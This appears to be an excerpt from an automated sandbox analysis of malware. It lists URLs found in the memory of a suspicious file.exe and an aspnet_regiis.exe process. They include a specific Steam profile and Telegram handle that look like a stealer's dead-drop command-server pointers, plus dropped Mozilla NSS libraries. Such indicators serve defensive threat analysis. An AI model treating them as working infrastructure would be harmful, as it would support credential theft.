Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://help.steampowered.com/en/
Source: DBFIEH.3.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: https://mozilla.org0/
Source: file.exe String found in binary or memory: https://pidgin.im0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: file.exe String found in binary or memory: https://sectigo.com/CPS0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/market/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611997804188699&
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869Y
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869x
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/s
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/about/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/news/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/points/shop/
